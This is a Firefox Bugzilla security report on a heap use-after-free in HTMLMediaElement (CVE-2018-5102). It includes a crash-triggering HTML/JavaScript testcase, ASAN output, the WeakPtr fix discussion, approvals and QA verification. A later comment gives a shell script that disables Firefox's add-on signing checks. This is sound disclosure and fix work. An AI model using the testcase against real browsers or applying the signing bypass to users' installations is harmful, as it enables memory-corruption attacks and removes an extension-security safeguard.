Bug 1419363 (CVE-2018-5102)

heap-use-after-free in mozilla::dom::HTMLMediaElement::NotifyMediaStreamTracksAvailable

VERIFIED FIXED in Firefox -esr52

Status

()

defect
P1
normal
Rank:
5
VERIFIED FIXED
a year ago
8 months ago

People

(Reporter: nils, Assigned: pehrsons)

Tracking

({csectype-uaf, sec-high})

59 Branch
mozilla59
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr5258+ verified, firefox57 wontfix, firefox58+ verified, firefox59+ verified)

Details

(Whiteboard: [adv-main58+][adv-esr52.6+][post-critsmash-triage])

Attachments

(3 attachments)

(Reporter)

Description

a year ago
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=d4753dc14b2ab9c42123b6d60a68106df40f45cd). It requires the fuzzPriv extension.


crash.html:
<script>
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o55=document.createElementNS('http://www.w3.org/1999/xhtml','video');
	o73=document.createElementNS('http://www.w3.org/1999/xhtml','video');
	o81=o73.mozCaptureStreamUntilEnded();
	o55.srcObject=o81;
	spin();
	o55=null;
	o81=null;
	o73.setAttribute('src','data:video/webm;base64,GkXfowEAAAAAAAAfQoaBAUL3gQFC8oEEQvOBCEKChHdlYm1Ch4ECQoWBAhhTgGcBAAAAAAACfhFNm3RALE27i1OrhBVJqWZTrIHfTbuMU6uEFlSua1OsggEwTbuMU6uEHFO7a1OsggJh7AEAAAAAAACkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVSalmAQAAAAAAAEUq17GDD0JATYCNTGF2ZjU2LjQwLjEwMVdBjUxhdmY1Ni40MC4xMDFzpJAI9vs3HzFdyEBxXtVbMzM0RImIQJdwAAAAAAAWVK5rAQAAAAAAADuuAQAAAAAAADLXgQFzxYEBnIEAIrWcg3VuZIaFVl9WUDmDgQEj44OEDuaygOABAAAAAAAABrCBAbqBAR9DtnUBAAAAAAAA3ueBAKOmgQAAgKJJg0IAAAAAAMAHBIODCoAABAAAEb//+UIU3iZw//Z8AACjxIEA+gCkAIBJegCGwAAGIAAAALn///wyA/////7OSv///y4AAKYAQJacAExAAAMgAAAc//+AD////+bR///nIADBIBzBo5uBAfQApgBAlpwATcAAAyAAAAD8//4WX/5f8KCjoIEC7gCmAECWnABNgAADIAAAALn+eD///98F////TgAAo5OBA+gApgEAlpwATWAAAyAAAF5Yo5eBBOIApgBBDpwATSAAAyAAADTN/8gAABxTu2sBAAAAAAAAEbuPs4EAt4r3gQHxggF38IED');
	o73.play();
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();;
}
</script>
<body onload="start()"></body>

ASAN ouput:
=================================================================
==24229==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a00009eb70 at pc 0x7ff2afdc4883 bp 0x7ffea6c8e490 sp 0x7ffea6c8e488
READ of size 8 at 0x61a00009eb70 thread T0 (file:// Content)
    #0 0x7ff2afdc4882 in operator! /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:312:36
    #1 0x7ff2afdc4882 in mozilla::dom::HTMLMediaElement::NotifyMediaStreamTracksAvailable(mozilla::DOMMediaStream*) /builds/worker/workspace/build/src/dom/html/HTMLMediaElement.cpp:2258
    #2 0x7ff2affd159f in mozilla::DOMMediaStream::CheckTracksAvailable() /builds/worker/workspace/build/src/dom/media/DOMMediaStream.cpp:1361:19
    #3 0x7ff2affeba42 in applyImpl<mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #4 0x7ff2affeba42 in apply<mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #5 0x7ff2affeba42 in mozilla::detail::RunnableMethodImpl<mozilla::DOMMediaStream*, void (mozilla::DOMMediaStream::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #6 0x7ff2aad2a428 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/TaskDispatcher.h:214:37
    #7 0x7ff2aad2758b in mozilla::EventTargetWrapper::Runner::Run() /builds/worker/workspace/build/src/xpcom/threads/AbstractThread.cpp:150:32
    #8 0x7ff2aad24861 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #9 0x7ff2aad4a196 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #10 0x7ff2aad64b18 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #11 0x7ff2abb3ff41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #12 0x7ff2abaa06bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #13 0x7ff2abaa06bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #14 0x7ff2abaa06bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #15 0x7ff2b15a723f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
    #16 0x7ff2b58dede7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #17 0x7ff2abaa06bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7ff2abaa06bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7ff2abaa06bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7ff2b58de79a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #21 0x4ebb1e in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #22 0x4ebb1e in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #23 0x7ff2c857c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #24 0x41d408 in _start (/fuzzer3/firefox/firefox+0x41d408)

0x61a00009eb70 is located 240 bytes inside of 1400-byte region [0x61a00009ea80,0x61a00009eff8)
freed by thread T0 (file:// Content) here:
    #0 0x4bb93b in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7ff2aabe3a17 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
    #2 0x7ff2aabeb0bb in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
    #3 0x7ff2aabeb0bb in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3925
    #4 0x7ff2aabea5d3 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3746:9
    #5 0x7ff2aabee420 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4315:21
    #6 0x7ff2adc7ac0d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1505:3
    #7 0x7ff2ad7b6a5b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1450:3
    #8 0x7ff2aad74ce1 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7ff2ac587df0 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7ff2ac587df0 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7ff2ac587df0 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7ff2ac58eb7f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #13 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #14 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #15 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #16 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #17 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #18 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #19 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #20 0x7ff2b65caef3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2967:12
    #21 0x7ff2ac4a739b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #23 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #24 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #25 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #26 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #27 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #28 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #29 0x7ff2b65ccd7b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3026:12
    #30 0x7ff2af10f335 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7ff2afb12d5d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7ff2afb12d5d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7ff2afadade6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1117:51
    #34 0x7ff2afadcfb2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1292:20
    #35 0x7ff2afabe2b1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #36 0x7ff2afac1782 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #37 0x7ff2b1e2e1de in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bbc8c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed09d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7ff2afe723a6 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7ff2afe723a6 in NS_NewHTMLVideoElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLVideoElement.cpp:38
    #4 0x7ff2afec7c66 in CreateHTMLElement /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:392:41
    #5 0x7ff2afec7c66 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsTSubstring<char16_t> const*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:363
    #6 0x7ff2adcabdd5 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsTSubstring<char16_t> const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:182:12
    #7 0x7ff2adb775f7 in nsDocument::CreateElementNS(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::dom::ElementCreationOptionsOrString const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:6143:8
    #8 0x7ff2af1539f4 in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1305:59
    #9 0x7ff2af6ec630 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #10 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #12 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #13 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #14 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #15 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #16 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #17 0x7ff2b65ccd7b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3026:12
    #18 0x7ff2af10f335 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #19 0x7ff2afb12d5d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #20 0x7ff2afb12d5d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #21 0x7ff2afadade6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1117:51
    #22 0x7ff2afadcfb2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1292:20
    #23 0x7ff2afabe2b1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #24 0x7ff2afac1782 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #25 0x7ff2b1e2e1de in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #26 0x7ff2b4ec70f1 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7779:21
    #27 0x7ff2b4ec3114 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7577:7
    #28 0x7ff2b4eca9af in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7474:13
    #29 0x7ff2ac99b373 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #30 0x7ff2ac99a4dc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #31 0x7ff2ac997568 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
    #32 0x7ff2ac999482 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
    #33 0x7ff2ac99a0dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
    #34 0x7ff2aaef4400 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:312:36 in operator!
Shadow bytes around the buggy address:
  0x0c348000bd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c348000bd20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c348000bd30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c348000bd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c348000bd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c348000bd60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd
  0x0c348000bd70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bd80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bd90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bda0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bdb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==24229==ABORTING
(Reporter)

Comment 1

a year ago
Posted file ASAN output
Group: core-security → media-core-security
sec-high --> P1
Added various media people
Priority: P2 → P1
Component: Audio/Video → Audio/Video: MediaStreamGraph
NI pehrsons/jya to look deeper
Flags: needinfo?(jyavenard)
Flags: needinfo?(apehrson)
Rank: 5
(Assignee)

Comment 4

a year ago
I'll take this. Suspect so far is bug 879717, the first media bug I ever tackled.
Assignee: nobody → apehrson
Status: NEW → ASSIGNED
Flags: needinfo?(jyavenard)
Flags: needinfo?(apehrson)
(Assignee)

Comment 5

a year ago
This is from bug 879717 indeed. I have a simple patch coming up that should go cleanly on all affected branches.
It depends on HTMLMediaElement supporting WeakPtr. This was added in 50 by bug 1267918 so even 52 is safe.
Blocks: 879717
(Assignee)

Comment 6

a year ago
Attachment #8933289 - Flags: review?(jib)
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

Review of attachment 8933289 [details] [diff] [review]:
-----------------------------------------------------------------

Lgtm, but using a weakPtr means yielding to the fact that some invariant we thought we had, no longer exists (or never existed).

I'm a bit worried we're merely pushing the problem ahead of us, since HTMLMediaElement::MediaStreamTrackListener 20 lines below uses the exact same pattern.

But from irc I understand OnTracksAvailableCallback is unusually nasty because it's fire and forget, and explicit removal doesn't exist, unlike UnregisterTrackListener(), so this seems like the right approach, and might suffice.
Attachment #8933289 - Flags: review?(jib) → review+
Should we maybe log a message or something?
(Assignee)

Comment 9

a year ago
(In reply to Jan-Ivar Bruaroey [:jib] (needinfo? me) from comment #7)
> Comment on attachment 8933289 [details] [diff] [review]
> Switch to WeakPtr
> 
> Review of attachment 8933289 [details] [diff] [review]:
> -----------------------------------------------------------------
> 
> Lgtm, but using a weakPtr means yielding to the fact that some invariant we
> thought we had, no longer exists (or never existed).
> 
> I'm a bit worried we're merely pushing the problem ahead of us, since
> HTMLMediaElement::MediaStreamTrackListener 20 lines below uses the exact
> same pattern.
> 
> But from irc I understand OnTracksAvailableCallback is unusually nasty
> because it's fire and forget, and explicit removal doesn't exist, unlike
> UnregisterTrackListener(), so this seems like the right approach, and might
> suffice.

MediaStreamTrackListener is safe since we guarantee to EndSrcMediaStreamPlayback() before destroying the media element (called from both CC and dtor as fallbacks).


(In reply to Jan-Ivar Bruaroey [:jib] (needinfo? me) from comment #8)
> Should we maybe log a message or something?

Destroying the media element before the MediaStream has tracks available is valid, so I'm not sure it adds that much. One could probably see that the media element is going away and that tracks become available as explicit events in existing logs.
(Assignee)

Comment 10

a year ago
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
It's fairly obvious that this fixes a UAF, and with some code tracing and API knowledge one could probably work out how to trigger it quite easily too. However triggering involves GC so it's not fully deterministic.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
No, though the patch itself is pretty clear.

Which older supported branches are affected by this flaw?
37 and up, so all supported.

If not all supported branches, which bug introduced the flaw?
bug 879717

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
This patch should go clean on all branches.

How likely is this patch to cause regressions; how much testing does it need?
I don't see any such risk.
Attachment #8933289 - Flags: sec-approval?
sec-approval+ for trunk. Please nominate the patch (assuming it does apply) for Beta and ESR52.
Attachment #8933289 - Flags: sec-approval? → sec-approval+
(Assignee)

Updated

a year ago
Keywords: checkin-needed
(Assignee)

Comment 12

a year ago
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration:
User impact if declined: js-triggerable (not completely, depends on GC) UAF
Fix Landed on Version: It's about to go into 59
Risk to taking this patch (and alternatives if risky): Very very low.
String or UUID changes made by this patch: None
Attachment #8933289 - Flags: approval-mozilla-esr52?
Attachment #8933289 - Flags: approval-mozilla-beta?
(Assignee)

Comment 13

a year ago
I should mention I tried applying it to beta and esr52 and it went cleanly.
https://hg.mozilla.org/mozilla-central/rev/e0a21cc26e07
Status: ASSIGNED → RESOLVED
Last Resolved: a year ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

Fix a sec-high. Beta58+ & ESR52+.
Attachment #8933289 - Flags: approval-mozilla-esr52?
Attachment #8933289 - Flags: approval-mozilla-esr52+
Attachment #8933289 - Flags: approval-mozilla-beta?
Attachment #8933289 - Flags: approval-mozilla-beta+
Group: media-core-security → core-security-release
Whiteboard: [adv-main58+][adv-esr52.6+]
Alias: CVE-2018-5102
Flags: qe-verify+
Whiteboard: [adv-main58+][adv-esr52.6+] → [adv-main58+][adv-esr52.6+][post-critsmash-triage]
Flags: sec-bounty?
I managed to reproduce the initial issue using mozilla-central.pushdate.2017.11.21.20171121095304.firefox.linux64-asan-debug build. Also I can confirm that the latest corresponding builds for Nightly (mozilla-central.pushdate.2018.01.22.20180122111948.firefox.linux64-asan-debug) and ESR (mozilla-esr52.pushdate.2018.01.21.20180121200330.firefox.linux64-asan-debug) are verified fixed using Ubuntu 16.04 x64. 
I encountered difficulties for Beta: 
- the fuzzPriv extension cannot be installed, even with xpinstall.signatures.required set to false, extensions.legacy.enabled set to true or extensions.allow-non-mpc-extensions set to true
- I cannot find a DevEdition asan build in https://tools.taskcluster.net/index/artifacts/gecko.v2
- the fuzzing build workaround is not working in this case
Is there another workaround in order to verify this issue on Fx 58? 
If no, Nils, do you think you can verify this on 58?
Status: RESOLVED → VERIFIED
Flags: needinfo?(nils)
Flags: needinfo?(mwobensmith)
(Reporter)

Comment 20

a year ago
Yes, I can verify that this is fixed on 58 as well.

In order to get the fuzzPriv extensions running on beta and release I use a fairly dirty hack to disable the signing and legacy checks. The following shell script does this:

mkdir tmp
cd tmp
unzip ../firefox/omni.ja
rm ./jsloader/resource/gre/modules/addons/XPIProvider.jsm
sed -i -e 's/function mustSign(aType) [{]/ function mustSign(aType) {return false;/g' ./modules/addons/XPIProvider.jsm
sed -i -e 's/function isDisabledLegacy(addon) [{]/function isDisabledLegacy(addon) {return false;/g' ./modules/addons/XPIProvider.jsm
rm ../firefox/omni.ja
zip -qr9XD ../firefox/omni.ja *
cd ..
Flags: needinfo?(nils)
Thanks for verifying, Nils, and thanks for the information on how to work around the fuzzPriv issue.
Flags: needinfo?(mwobensmith)
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.